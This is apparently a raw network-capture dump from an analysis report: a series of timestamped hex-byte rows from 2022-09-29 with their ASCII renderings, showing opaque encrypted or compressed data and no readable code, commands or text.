                                                                                                                                                    2022-09-29 12:59:00 UTC3522INData Raw: b5 59 a7 80 6d 42 00 4e d3 5b 12 35 ec 94 e4 96 84 ae fb 72 a5 5e 8c 9e 9f 5d 1b e5 69 b6 e1 f9 4e 60 e0 fa d0 9b a5 36 ef a2 85 55 20 8b e8 a0 b8 f9 4f 5a a4 f3 8a fc a9 6a cb ed ed 3c 9e e5 b6 27 95 c9 2d f5 6e ea d8 f0 3e 34 d7 8b 80 46 b6 36 34 89 89 e9 54 bc 2e 95 e0 b0 63 56 1e d6 db 26 2e 67 12 33 4a 74 d0 ce cc de c7 61 7f b1 01 7b fe 93 08 1c 02 6e 92 49 e4 ec f5 3f b2 db 66 ca 71 93 48 c5 ca 37 7c 65 48 5b c2 fb 83 1d 1a 7c 51 7a f3 5d 47 41 e1 8d 50 1e 95 48 d3 ac 96 c0 4e 85 91 49 98 8f db 48 f8 61 48 e5 3a 44 c8 da b1 14 43 cf fa 24 91 c7 76 0a 4b 6b 09 d0 f7 4f c5 b7 25 d1 65 67 1b 34 63 a5 1c 02 da 28 f6 05 16 0e 95 ca 7b 77 79 4b 64 8f b9 34 6a 44 3d 45 9b 5b 57 4e e6 36 48 dd c4 8f a4 fb 49 82 2a 25 48 3d 5a 47 8d 6a 29 8d 4b 11 11 85 a1
                                                                                                                                                    Data Ascii: YmBN[5r^]iN`6U OZj<'-n>4F64T.cV&.g3Jta{nI?fqH7|eH[|Qz]GAPHNIHaH:DC$vKkO%eg4c({wyKd4jD=E[WN6HI*%H=ZGj)K
                                                                                                                                                    2022-09-29 12:59:00 UTC3538INData Raw: ec 23 e2 ee 96 08 d7 08 f1 15 a4 26 0f 8f 9e ab 6b 9a 26 9c 77 71 80 f9 0c f9 33 d9 5e b8 31 a8 90 60 7f d9 53 1f 95 f2 00 ef 76 5a 31 f1 83 0f 6f 65 04 b5 47 90 2c 37 52 2c 4b 31 18 de a4 30 55 9d a9 d7 d3 a4 f1 d5 1c 3b bf 62 56 b9 b6 73 d2 ce f3 e2 e9 06 f0 68 2e 41 cd b0 e6 c1 d1 6e b6 b9 ea 5f 65 6e 76 da 5c 98 3b f3 68 f6 5b c4 68 a4 16 20 01 c1 12 6f 68 41 da 8a 80 ae 73 5b 9d 7f ef 10 2a ae 80 5b 84 ff 71 09 5f 6f 94 f5 b3 74 fc 1b b5 eb 81 6e d1 31 33 4d 15 06 28 9b d2 ea c6 f7 d8 d1 2f 37 31 4f c5 93 f0 fb 99 dc ce e4 a8 43 9a 73 1d a0 ea ce ff 17 3c 96 0c 16 88 94 97 41 13 a0 88 6b cc 33 67 cd 1e 54 fc 42 01 3e d9 f8 36 41 59 84 58 03 60 68 3a 07 dc 8b 88 0b b5 66 57 d7 96 51 b9 0b 33 aa e9 e8 c1 78 e2 38 92 30 bb cb 57 85 05 bf 6a 6a 2c fe 1e
                                                                                                                                                    Data Ascii: #&k&wq3^1`SvZ1oeG,7R,K10U;bVsh.An_env\;h[h ohAs[*[q_otn13M(/71OCs<Ak3gTB>6AYX`h:fWQ3x80Wjj,
                                                                                                                                                    2022-09-29 12:59:00 UTC3554INData Raw: da 6c 60 36 d5 c0 41 68 e1 78 fd a6 e8 35 aa 66 fb ca 6c ba 8c f9 51 0a f3 08 d2 43 60 3b bc c1 c5 7e 7f bb 05 06 3d 07 99 02 a8 d0 54 5b 1a 54 35 6b 00 30 af 8c 4e fd 08 89 27 08 11 a2 e7 b6 d9 73 13 43 c0 4f 36 91 f5 96 7c 05 1f f8 49 e3 aa 03 46 55 59 ed a1 78 4b 9b ce a5 33 9b dd 5b 67 74 d3 43 8a 1f 23 ff 38 27 ab e4 7a 82 bc ec 67 ca d8 fd 8f 9d fb 99 de b2 32 98 c6 d8 61 ef 53 dd 08 59 16 6e 30 0b 2d f7 55 cf a2 64 9e a5 62 9e 84 14 4f b5 e3 e0 82 a5 bd ad 0d 2b 3c 0b fe 96 5f 82 f0 09 ce 5f bb 8b 77 e5 00 a8 fa 22 f6 f4 f7 a1 a5 d5 3a 1d 47 e5 87 85 32 8d b6 ad 03 8c f9 8d e0 f2 20 b5 7c 14 bc 0d 44 29 83 7c de ff dd c0 fb af 0d d2 e0 e1 ab da c9 92 c6 41 99 a4 b8 96 e2 26 aa dd b7 8b 84 df ec 51 9b 88 bf aa 09 3e da 77 48 1c 20 e6 5f 23 40 a4 fb
                                                                                                                                                    Data Ascii: l`6Ahx5flQC`;~=T[T5k0N'sCO6|IFUYxK3[gtC#8'zg2aSYn0-UdbO+<__w":G2 |D)|A&Q>wH _#@
                                                                                                                                                    2022-09-29 12:59:00 UTC3570INData Raw: 3d fd 3c d6 d2 fe 45 71 d0 aa 6e fd 9d c4 5b 11 33 1b 23 d0 a0 71 de 3c 63 6c 4a 3b c1 ae f3 eb 83 be dd 69 55 9c b1 03 c9 6f f4 11 c9 6f 44 a1 38 f5 d6 f2 d7 e3 2e 67 bc a8 ac 6b 5c fc 00 cb c6 32 13 61 78 d8 8b 11 bf aa 20 24 0f ab 76 c6 15 2e 4c cb 1f 9c 72 28 47 35 67 32 57 18 a8 c9 37 c3 9f b4 36 80 de ea 70 be 52 f9 21 ae d5 7c 7c 40 02 a7 50 1a a4 56 69 8f 6c 1f 4a 3c c3 66 8f 62 b4 51 41 a5 1a b7 da ec 18 59 ce 29 d5 6b d6 52 8f 9d 2a 9a 18 a3 64 db a8 4f 88 66 de cb f8 20 84 83 de 78 4d 12 1d fa d0 a8 2b b3 60 d7 9d 63 ec 96 43 85 8f 55 97 ab 52 d3 76 f9 ce cf 15 04 0e 05 8d 3c 70 6e 9b 9d 8a ba ff 58 63 ed 24 5a db 34 88 c5 6d b2 dd dd b3 82 f7 7c 47 c3 ae 3f 0b b2 cf 5a 9d b9 7d af fd 7b d0 c8 f1 10 e3 45 5e 44 9b 86 2b 34 fb 77 43 f3 b7 d7 92
                                                                                                                                                    Data Ascii: =<Eqn[3#q<clJ;iUooD8.gk\2ax $v.Lr(G5g2W76pR!||@PVilJ<fbQAY)kR*dOf xM+`cCURv<pnXc$Z4m|G?Z}{E^D+4wC
                                                                                                                                                    2022-09-29 12:59:00 UTC3586INData Raw: 67 a5 c8 5c ec 36 18 ec a6 7a 26 5f 02 49 fd e6 cc f9 1b 7e b3 55 3a fb c6 a2 64 a4 37 1d 72 bf 27 06 78 ce 43 dd dd b4 fe 5b b6 8e 5a 4d 96 27 ff 32 e1 61 41 6f c6 37 c9 f5 52 4f 57 2c e2 21 1b 2f 05 1f 78 af f7 e9 d2 f2 f2 9e a8 01 df 3c 98 bf d2 b9 1b 67 b9 f3 e6 8e f6 04 58 3c 13 02 e9 3d 62 a9 74 d3 50 68 a4 dc 5e df 25 8a a9 a9 26 03 2f da 26 40 49 3c 5a c0 c0 fd b0 7d f4 9d 05 25 f0 a6 04 c8 20 fc 4e e4 be 3d 68 ee 0f 4b bd 3c a5 2d 7d 65 4e 65 da c6 99 c4 ed b3 f7 14 c9 ab 68 e5 25 50 e0 22 aa 1f 3c c0 b0 08 f5 f8 fe 10 18 dd 6d b6 0d 81 e0 66 7d 20 97 d3 4b ee 3c a0 c3 e6 47 7a b6 db ad 83 7a 7b a5 45 33 74 63 f2 15 62 e4 63 ac d2 d1 de fe 99 80 57 03 4f 13 49 5e f1 00 55 49 f2 47 be b6 3e d8 8c c9 8b 7f 46 ee f9 b6 f5 cb 59 18 f2 a1 3d de 21 86
                                                                                                                                                    Data Ascii: g\6z&_I~U:d7r'xC[ZM'2aAo7ROW,!/x<gX<=btPh^%&/&@I<Z}% N=hK<-}eNeh%P"<mf} K<Gzz{E3tcbcWOI^UIG>FY=!
                                                                                                                                                    2022-09-29 12:59:00 UTC3602INData Raw: ed ad 9b fb 8f 44 6e d2 3a f5 75 7b 08 75 58 51 ae 1c 34 d9 37 d1 67 92 9a 67 dc 00 fe 1c cc 0c ca 82 a7 25 70 82 09 58 19 38 81 bc 61 a9 54 ce 3c cf bf 49 5b ce 9e 66 8f f2 c4 3a ba 08 b9 29 32 1e d4 79 da 5a 28 0a b4 f1 4d 2b d3 8c 94 cc 73 b4 42 7f 8e d5 7a 10 99 08 e7 58 5c eb 94 71 fc 78 dd 6b 17 80 d7 49 f5 c8 7f ef 32 ff 66 70 65 62 b6 ed 46 6f de 2a 4d bf 32 2e 0b 51 5e 05 cd ba 89 51 6c 69 f8 e1 82 87 a2 e2 ca 25 6a 8d bb f7 4f 7f 67 ff b1 e3 eb c1 59 8a 26 7d 2a d5 f8 e3 b3 f4 19 e5 34 9c 70 1b 33 ef ea f3 9e 0f e7 f7 47 7c 0b e0 48 ed 5f f1 c8 db 2a f5 93 9b 2e 34 2c 83 83 1f c9 51 65 89 5d fe a2 37 77 d6 48 74 b3 a9 19 3e b8 b9 58 8f cd e9 f2 53 a2 7d 68 62 c1 ad 3e e4 80 ee 5f 56 8d e3 4b a7 59 1d c3 9b b2 6d 7d e6 c2 48 9e d1 aa bf 6d 13 2c
                                                                                                                                                    Data Ascii: Dn:u{uXQ47gg%pX8aT<I[f:)2yZ(M+sBzX\qxkI2fpebFo*M2.Q^Qli%jOgY&}*4p3G|H_*.4,Qe]7wHt>XS}hb>_VKYm}Hm,
                                                                                                                                                    2022-09-29 12:59:00 UTC3618INData Raw: d5 65 d5 6a 67 e6 51 05 1e 9e 74 f3 e9 f6 d5 b5 2b 17 81 65 71 29 71 06 4f f9 eb 05 f7 21 3e 16 fa ab 49 fe fc 86 7d 63 63 98 c9 dc 7b d0 8f 1a 98 99 58 fe 91 aa 6c 7c 88 df df c9 f9 03 1f 9e 5e d9 c9 d5 ba 3d 5e 24 76 3d e6 e6 c1 29 e5 c7 d6 0b 3c c7 1a f9 85 6c 9d b0 8b fb 71 eb ce ca 7a 82 f6 5f 6d 77 4b 24 70 6c 64 38 22 58 53 f9 ba 3b 71 64 1d 73 2f 0e 83 e1 1a 2b 90 54 f6 ad 74 64 83 f2 30 ff d1 dd 0a c7 1e 57 8e be ce 15 6c 4c 66 b3 c4 1e 3f 01 04 60 54 95 b7 6a 13 fb 30 7b 40 c9 f5 18 24 2d 12 ef d2 fd 77 08 b2 e1 ce fc ae e7 3c c0 85 4b 60 6d 58 ce 28 2f da de 89 d2 c0 9e 37 86 1a 72 44 c1 05 e8 f5 96 25 4b cd d3 a7 64 4a 57 44 1d c6 b3 c9 be ac a7 bc a6 a3 43 8a 90 b4 59 d0 fc c2 b9 a3 05 43 64 2f 7f e4 28 ec ab d1 b2 e6 bd e5 91 3a 4e 9c 25 45
                                                                                                                                                    Data Ascii: ejgQt+eq)qO!>I}cc{Xl|^=^$v=)<lqz_mwK$pld8"XS;qds/+Ttd0WlLf?`Tj0{@$-w<K`mX(/7rD%KdJWDCYCd/(:N%E
                                                                                                                                                    2022-09-29 12:59:00 UTC3628INData Raw: fb 9f be 34 82 58 18 ae fc 6e ba 9c c4 e8 c5 cd e3 4e 45 25 e0 a5 30 76 0b d3 91 51 1e dd 9c 40 3b ed 9e d6 55 c6 44 56 c4 3b d2 6e c7 6a 91 70 f7 17 7a 96 e2 7e 91 21 f3 10 35 4f 24 f3 67 c8 d5 ff 5b ac ec 98 7a f4 23 07 64 0e ac d5 67 b3 41 e6 d0 a9 ab 4d 0e 8f 55 ba d1 f8 a9 b4 28 77 49 8b 19 f1 f7 00 8d b5 ff dc a0 37 e3 f6 ce 54 e9 fe 53 03 21 8b ac bd e5 cf d1 8b 1f f0 b7 6b 82 54 17 d9 43 14 7b a4 ab f1 46 49 37 b8 0f 59 79 3b ef 97 93 a6 83 11 bc 29 60 44 6e ed ed 31 b1 9b 9f f2 6d 81 1a 22 e5 29 5c a8 23 f0 1a 92 a5 22 08 39 f7 50 5f 26 8c 65 e6 7d f8 92 cf 16 02 7d d3 db 56 a8 ec 2c 06 b7 64 09 7e 96 b5 ff 83 87 96 7d 70 f9 36 33 fd f7 55 3c 18 72 5c 34 12 38 7b 0b 37 be e3 c1 69 a7 73 44 ce 95 90 56 a5 79 b4 3e 71 5e 21 39 ca 4b 54 f1 75 81 d9
                                                                                                                                                    Data Ascii: 4XnNE%0vQ@;UDV;njpz~!5O$g[z#dgAMU(wI7TS!kTC{FI7Yy;)`Dn1m")\#"9P_&e}}V,d~}p63U<r\48{7isDVy>q^!9KTu
                                                                                                                                                    2022-09-29 12:59:00 UTC3644INData Raw: b5 43 a5 39 e1 8c ba cf a4 ff d3 96 e1 9b 43 5f 96 c7 2a 3b f1 2c 1e 4d 26 b4 26 5b cc 42 08 e7 5a 3e 42 3c b5 a2 42 3a fd b2 50 fe 1a b2 87 5b 3c 52 87 32 b6 f6 53 63 ba a9 9b f5 8c b5 4c e0 4b 24 41 39 e6 c5 70 d6 fc d9 57 6a d9 fd 34 8b 31 94 b1 b6 03 5b 1f db 7c 3b bb c3 e9 6c b8 bb 85 f8 a1 54 b0 94 b0 ec 40 52 ec ea f7 31 96 5b 59 da 63 f5 f2 31 bd bc a8 99 e7 dc 0d 73 58 16 ce 8d de 74 a4 56 a2 72 1b a6 f1 b5 74 00 5b de 53 e6 a7 6c 62 b5 ca 2f b7 80 05 f6 6d 1d ea 46 90 c3 43 c8 3e 84 71 76 08 aa 95 1a 85 10 fc 9e 45 c7 ae ec d5 e4 49 dc 50 f5 61 92 d0 21 f1 6a 57 ed 1e 38 c7 d2 ff 7f 52 20 0e 9b 57 cc ce d2 6c 9c 1e b0 47 a7 a4 08 4b 42 ad 29 49 3a d2 a3 d8 b9 1f f5 0d e1 8f 81 55 2e b2 54 53 82 79 37 44 0f b6 63 c5 ba ce d7 56 07 24 e9 71 42 aa
                                                                                                                                                    Data Ascii: C9C_*;,M&&[BZ>B<B:P[<R2ScLK$A9pWj41[|;lT@R1[Yc1sXtVrt[Slb/mFC>qvEIPa!jW8R WlGKB)I:U.TSy7DcV$qB
                                                                                                                                                    2022-09-29 12:59:00 UTC3660INData Raw: a5 73 42 cc 6b 55 5b 2a 1d 8e fd 06 a2 c4 c5 12 00 1c 36 21 86 27 d2 79 59 92 82 1f 37 3a 2b 97 a5 e9 67 9c 64 78 34 2c 79 88 9b 1b 79 bf 01 5b 83 b0 85 07 9d 6f 3a 74 5b 2c 79 8b a2 91 cc 35 56 1f f0 52 3d 7f f8 63 a9 a5 f3 49 61 f1 e8 8b 55 a9 61 86 a7 74 3c 41 66 4c 8b ec ca 36 0f bc db e9 69 6f 2c 52 c4 3c d6 39 51 34 4c a0 23 1c a6 77 dd 28 50 c8 b0 e6 bb eb c1 13 db 25 1a df cd 64 bc 14 20 1a 9f 1a 5b cc 7f b0 63 1c 16 43 59 3e 50 3f 5b 8a 26 ac e2 40 fc be ad a3 d2 48 0a 6b d9 5a 08 71 67 aa 2a 55 d6 20 a0 63 68 2f 34 c7 5c 8c fe 28 95 1d 9d 1b 39 64 20 42 15 9c f2 fe e5 16 35 7b 0f 61 f9 03 f9 76 91 6e 7d 7c 36 fc 77 9f 32 66 ed a3 38 77 19 a4 48 42 df 5c b8 d7 36 ef 90 1b 59 ae 28 64 ad 61 95 f7 6f 74 1b a0 60 1b 27 d3 80 dd f1 25 c1 de be cf 88
                                                                                                                                                    Data Ascii: sBkU[*6!'yY7:+gdx4,yy[o:t[,y5VR=cIaUat<AfL6io,R<9Q4L#w(P%d [cCY>P?[&@HkZqg*U ch/4\(9d B5{avn}|6w2f8wHB\6Y(daot`'%
                                                                                                                                                    2022-09-29 12:59:00 UTC3676INData Raw: 19 bf e4 18 bc c3 82 96 44 22 ca 34 e1 17 67 99 57 8e 4c 65 23 69 1f b5 ea e8 67 6c a2 01 44 5f 07 3c 54 86 b2 0b bc 69 6d 6e 61 0e 20 b9 42 06 83 1c bc ac a1 66 f8 48 f4 41 00 9e b8 ed 1c 40 65 71 b1 1e 8f 72 4a 44 f6 6e 01 51 41 e9 51 6c 2a a0 c8 11 a5 c8 1b fb 9c a4 74 a1 85 01 63 d8 6a 6c 8a ad 56 64 c2 45 08 e9 da df 4a ea 2f 3e f5 70 99 4b 4a d6 bc 66 bc a7 dc a9 02 94 34 48 12 85 ab 79 ec 20 0a bf 7b 41 95 d1 6e b6 e5 86 c0 da ce a8 02 9c 2e 61 15 1e 34 b2 d2 52 a6 31 be 6a 29 f5 e2 96 fc c4 8e 45 7e ce 83 88 23 e4 2c 89 af 7b 29 b1 bf 61 82 f1 c4 e9 06 51 d9 8f 8c 04 62 33 af cb 61 4b 5e b9 a8 d0 df 36 3c 65 66 e7 df 80 57 2c 10 f2 de 19 0f 3a 3a 1c ed bf 84 df 97 d3 d7 96 64 ee 8b b9 88 b5 a4 0d ff 41 f3 69 51 d8 e3 34 25 30 87 dd 2b b8 21 94 80
                                                                                                                                                    Data Ascii: D"4gWLe#iglD_<Timna BfHA@eqrJDnQAQl*tcjlVdEJ/>pKJf4Hy {An.a4R1j)E~#,{)aQb3aK^6<efW,::dAiQ4%0+!
                                                                                                                                                    2022-09-29 12:59:00 UTC3692INData Raw: 04 7f eb b8 44 a3 6b 2b d9 d2 f2 3e ce e2 cb 78 9f 0f 60 37 48 eb bf f2 cf 78 77 49 88 66 49 85 20 9a 30 42 1d b4 46 e5 d4 1b f6 3d 6f fd e0 06 8a 01 8c ed 39 2a 71 cf 36 1b d8 53 45 df 88 6d fb 5a cf 70 3d c9 ca 0f 58 69 75 68 94 bb b3 9f 81 1b 7a 5e cb 7c 6d 26 75 bf e9 94 b4 f1 5c 80 21 17 0d f9 96 8c 04 38 ee b6 06 09 7f 07 97 17 76 f1 a8 db 32 83 ff 2e 55 34 a2 90 2e e4 62 3c b4 e3 28 68 d8 95 17 05 d0 13 d7 f9 8c 46 9d 35 27 05 98 a3 1a d0 30 ac 1a dc a9 cb d5 40 4d 6e 32 51 c4 e9 8c c6 1b f8 d6 1b 60 a0 94 af 31 3d b8 62 23 b5 75 d6 a9 de 21 f6 6c 06 ef eb e4 3a 03 ce 4b e6 26 eb 38 6e 04 74 44 ea 29 99 1d 41 11 31 e3 93 ce 67 5e 39 20 5d 38 27 bb 06 4c 48 75 fc ad 43 8f 3d ec e9 c7 ac 46 25 fd 78 d6 c5 c4 03 be 64 ab 16 b1 ef 9b 01 92 fe 69 8b aa
                                                                                                                                                    Data Ascii: Dk+>x`7HxwIfI 0BF=o9*q6SEmZp=Xiuhz^|m&u\!8v2.U4.b<(hF5'0@Mn2Q`1=b#u!l:K&8ntD)A1g^9 ]8'LHuC=F%xdi
                                                                                                                                                    2022-09-29 12:59:00 UTC3708INData Raw: 0e 92 bc c5 22 59 33 56 34 ea 51 a1 e7 02 86 f4 02 2f fc d9 b4 fd 83 db a2 24 17 42 11 c4 2f 2d c6 7e 52 36 2d ac 97 96 ed b5 00 bc da e5 5a 73 14 f0 dc fc 88 13 77 76 2f 64 28 c3 ae 51 c9 a4 3b 1f b0 a2 f4 71 84 6f a1 56 02 eb 84 0f ce 14 c6 a9 72 50 b8 ca 7f 36 22 29 e9 ad 8d 24 6a bc b8 50 b9 69 3b aa b6 00 9d 04 e8 ea f8 01 54 ac cf 91 a2 ed d2 72 76 85 23 6f b6 fe 68 7f c1 43 9c 1e b7 61 5a 00 e0 53 f7 fc 68 0a de ce 12 cd 98 be 8c 85 f4 4a d5 57 21 48 31 8b 2f 57 a9 06 eb a8 b0 a0 9a ea 51 2c 58 15 ed 77 e2 83 c1 66 a8 7e 1e 2b 23 e9 5b bf a9 55 97 16 4c d7 44 75 1f da a1 51 96 dc 1c 76 35 da e7 13 b9 86 50 b8 96 78 f7 52 58 63 6a 2c 98 cd 66 8b c9 bd 2a a7 81 da 31 24 3a 26 47 23 7d e1 0c b5 e8 23 17 4a 83 fa 26 5d ef 4a 1b f3 ff e4 2f 04 79 a7 05
                                                                                                                                                    Data Ascii: "Y3V4Q/$B/-~R6-Zswv/d(Q;qoVrP6")$jPi;Trv#ohCaZShJW!H1/WQ,Xwf~+#[ULDuQv5PxRXcj,f*1$:&G#}#J&]J/y
                                                                                                                                                    2022-09-29 12:59:00 UTC3724INData Raw: c2 32 d8 ab 9b 80 c7 4f 4e 3d 90 f1 c2 82 29 24 e6 52 b8 40 bd 23 5d 65 db f3 86 8e 42 cb a2 8a 9d 9c 85 42 6a 30 98 e8 d5 fc 26 2f d1 dc 53 d1 fe 63 a3 5a f1 02 47 77 18 95 9e 83 f5 43 e9 fb e8 c4 7c 4a 8d 72 23 d0 62 30 c6 89 de 3c 3b 33 ca 12 69 1c a6 1f eb fb a8 82 50 8d f0 88 a7 44 0a 00 68 83 9d d3 1d db 61 56 89 4f cd d8 ea a1 49 2a c8 d3 4a cc c2 d0 7d ac c7 cb 96 3f 2e f4 28 d6 d9 03 fd ca f8 f9 20 f0 fd de 7d de bf 07 0b aa f5 fc 8c cb 41 84 d9 8f 98 62 4e 25 c4 80 f8 aa 56 23 c9 01 82 b3 1e e9 2c 61 b6 8c 01 44 9f 24 d1 81 aa 90 18 be 6e 0f 25 5b 04 14 fc c2 9e 3b f6 3d 36 37 0e 46 73 c4 d2 08 09 7c ba 16 0f 40 63 46 c9 9c d9 73 50 4a 89 bd 1e 6f 11 0b a9 7c df 74 cd 1d 9f 17 35 09 a7 56 a9 18 af fb d8 bb 61 c6 0d 16 8d 86 10 2b 38 07 0e 51 43
                                                                                                                                                    Data Ascii: 2ON=)$R@#]eBBj0&/ScZGwC|Jr#b0<;3iPDhaVOI*J}?.( }AbN%V#,aD$n%[;=67Fs|@cFsPJo|t5Va+8QC
                                                                                                                                                    2022-09-29 12:59:00 UTC3740INData Raw: 04 eb 87 25 44 71 48 90 5a 93 77 c6 ef 92 f8 fc a4 43 7b 06 07 08 71 ad a1 cd 4f 66 f9 5a 0c ab 1e 2c 51 c8 24 88 bd 1b af df 84 0d b8 38 c1 9f 38 6a dc b1 8f 4c 7f 52 7c e7 75 d9 f9 ce af da 7a 8e 16 26 58 b3 ee 1b c2 b5 84 fd 03 92 a3 fb cb 38 22 29 e8 74 f3 a4 05 e0 0a 17 9c a3 37 6c 61 06 64 7e 67 3e f7 96 65 eb a2 f0 64 ba 3c 7d b5 ed b5 2f ba 61 15 82 22 c5 78 f9 0e ce 24 7e 85 f1 dc 2c f4 a0 9b 3a a5 89 68 95 4b cd bb 57 f5 00 d2 a9 0e 28 7a 66 d4 d1 78 5f 35 79 33 20 55 43 4b e2 87 8a 65 f8 d6 d3 a7 4e 60 d2 17 e8 85 b0 4a ad d7 d4 72 2e f3 48 2d 2e 86 26 46 8f 90 ed 92 f8 5b 22 81 27 61 1c fb 08 a8 ff 86 b8 92 23 cd 69 52 0a 37 c1 d0 db 3c 79 bb 38 23 47 a9 7a 83 bf f0 78 9b 6d c6 40 37 03 49 34 ff e6 a2 e6 41 df 56 04 10 76 26 29 26 b5 3f d0 cd
                                                                                                                                                    Data Ascii: %DqHZwC{qOfZ,Q$88jLR|uz&X8")t7lad~g>ed<}/a"x$~,:hKW(zfx_5y3 UCKeN`Jr.H-.&F["'a#iR7<y8#Gzxm@7I4AVv&)&?
                                                                                                                                                    2022-09-29 12:59:00 UTC3756INData Raw: 58 01 ca 09 71 4f 24 f8 24 5c a3 3c 5d 92 14 fb af b7 c8 5c df 22 d9 89 15 82 31 5d 8f b3 f8 2e a4 23 94 21 cf d4 4d 3b 54 a9 30 11 3c 2d 48 79 1f d5 7d 8a b3 b2 c8 66 9f 3f 9e 5e ce 7f 44 55 c6 ce 12 67 c3 4f 08 96 c4 23 1a b1 bf c9 b6 d2 0a 02 38 25 dd 59 01 a4 11 ab 77 be 31 fd 2e f4 c7 99 b1 e6 34 b9 06 12 e7 dc f9 e8 a4 6d 9f 10 a3 fe 40 52 10 0f 2d 56 75 42 78 9c af 9e b1 07 82 59 a0 e7 78 c8 23 23 40 62 50 62 0f 4a 3d 07 d6 de b1 13 54 ac b9 31 ba f6 74 86 b7 4b fe 6f db 55 37 30 cc 79 4d 42 23 d8 01 52 ca d4 e8 05 a5 57 a4 8e 1d 58 e1 a1 8e 40 67 05 38 cb 5d 2c d3 42 52 0c 4c 12 33 0b 41 26 8b 8a 92 04 18 5c 7b 38 ad 4a 01 7a 6e a6 5f e7 41 a5 9c b7 9d 55 92 b7 d5 9b a1 18 f1 99 f3 ea b9 de fe 86 f9 c5 f6 51 9f 4a 77 de 3c f3 36 d4 98 64 b0 cf a2
                                                                                                                                                    Data Ascii: XqO$$\<]\"1].#!M;T0<-Hy}f?^DUgO#8%Yw1.4m@R-VuBxYx##@bPbJ=T1tKoU70yMB#RWX@g8],BRL3A&\{8Jzn_AUQJw<6d
                                                                                                                                                    2022-09-29 12:59:00 UTC3772INData Raw: 86 50 dd 59 02 dc 2d 9e e0 b0 18 c9 a6 94 b6 b5 3c b8 28 2c 04 75 84 26 80 17 5b 8a 76 6f 76 e4 36 78 1b 52 95 fe ce 21 1b 72 b0 4b a4 20 85 07 24 40 2e a2 91 88 0c 8a 4e 98 d2 e8 9c de de e9 bc 3f 9a bd fa 82 ae bb 12 e2 57 b5 9e 1e c2 cb a7 f7 a7 eb 82 2e 1c be 11 4d c1 05 77 ac 72 35 67 3b d0 03 a9 91 5b c8 b3 0a d1 48 28 cd 89 4d 14 0d 38 07 08 86 bc bb bc 29 95 8a 43 3a 2c e7 c2 b4 a0 c3 b3 52 54 36 18 c7 9d b0 69 f7 76 d7 56 45 7f bb 43 fa 64 f1 9d 4a ac 29 4a 43 d2 82 b6 29 5f 44 07 a5 09 98 9d ef b0 01 b4 e7 46 d3 9a 0a 4e c3 93 fc a7 90 36 fe f4 41 80 33 02 bf 91 33 59 3c 97 2c 93 63 30 b7 87 30 4e 36 22 e8 ce 91 cd 80 fc 32 18 c3 b5 f7 a0 f1 b0 a3 dc 5c 63 00 1e 07 be bd df ff ab 8b 89 f7 b0 bf 40 5b b3 99 6d be 93 06 36 9a 15 ac e6 2a 49 e4 67
                                                                                                                                                    Data Ascii: PY-<(,u&[vov6xR!rK $@.N?W.Mwr5g;[H(M8)C:,RT6ivVECdJ)JC)_DFN6A33Y<,c00N6"2\c@[m6*Ig
                                                                                                                                                    2022-09-29 12:59:00 UTC3788INData Raw: 46 bd a4 d9 9e ad 36 2f ad b1 91 06 24 98 3b 35 84 93 6e 2a 80 c7 c1 06 8c 17 1e ac 5f a5 47 b2 c6 66 13 a0 cd 70 a5 40 4a ea 72 80 44 07 75 65 e3 ea 3a 17 1e 6f d5 95 9f d8 ae 74 fd 4d 6b c9 e7 2d 4c 50 bc f2 d7 21 d6 8a 70 40 91 68 a5 6b 81 6a df 3d 9a 4f ab 57 44 93 f5 38 ee e5 90 88 68 9d 63 79 09 a0 b6 bf af 54 c0 f1 8b 0e b8 a6 26 b8 75 78 fd 88 5b 0b c6 5f d7 3d eb 5d 6b 76 88 55 fd 27 57 b5 fa 99 db a6 a9 d0 48 ef 67 bb ac 91 74 c6 03 22 f2 14 af 49 bf 58 6f 9f 0e 95 fe 55 0e 04 44 5f e7 46 3b cd 2b 6e cb 38 87 b7 e6 6d a1 9e bc 81 ea c4 4a 30 a9 d0 25 84 dc b8 cc b3 f7 16 3c 14 8c ae 02 23 22 a2 c7 33 f0 eb b3 b7 e8 87 5a e3 dd 9e 45 88 ad ca 69 fb dc c9 07 87 63 2a 52 e5 da 74 9f a0 c4 a1 54 ce 86 a5 b0 9e 4a 0e cd 68 43 f8 d2 d5 5f b2 59 9a bc
                                                                                                                                                    Data Ascii: F6/$;5n*_Gfp@JrDue:otMk-LP!p@hkj=OWD8hcyT&ux[_=]kvU'WHgt"IXoUD_F;+n8mJ0%<#"3ZEic*RtTJhC_Y
                                                                                                                                                    2022-09-29 12:59:00 UTC3804INData Raw: 61 61 03 a0 3a e7 6c 1b 80 e4 92 ea 3e e6 e2 97 6e b1 86 43 21 a9 5c da a7 85 cc 05 ca 9f d5 9e 8b 04 57 78 bd b6 f7 cd aa 1d d9 4e 6d eb 45 35 f9 66 ed 9a 3d 0a 26 43 17 1c c8 6b 62 54 22 03 0e bf d7 d5 a5 23 b6 17 44 fe 93 8e df 59 12 fc 23 b9 1c 31 01 c0 40 07 92 8f 6f 9c 05 32 4f 10 05 b9 9d 16 c1 a6 72 77 ed 29 52 3c e7 25 1c b7 76 1a c6 e3 28 ff a0 b6 fb bc 46 e7 84 af 38 f8 24 3b e3 45 74 34 0a 45 dc 82 41 36 37 e4 9c 42 67 c9 d9 3e 27 92 16 8d a0 40 54 bf 34 b4 67 94 04 2a c7 c5 04 a4 56 22 da 6f 26 80 b7 98 c3 a6 47 7f d0 f4 c8 ab 81 58 a2 ef d8 ee 05 17 88 52 67 7c c3 26 d3 a3 cb 64 5a 59 03 f7 78 9f 0b 6f 6b 22 f4 0a 6e 56 22 3f 95 33 8f 83 66 63 ae 5d 46 6b 56 fb 4f cc a6 ce b2 b4 5b d2 e8 92 96 df 2c 3b 70 be 2e d7 c2 1c 31 72 53 5a 32 81 7a
                                                                                                                                                    Data Ascii: aa:l>nC!\WxNmE5f=&CkbT"#DY#1@o2Orw)R<%v(F8$;Et4EA67Bg>'@T4g*V"o&GXRg|&dZYxok"nV"?3fc]FkVO[,;p.1rSZ2z
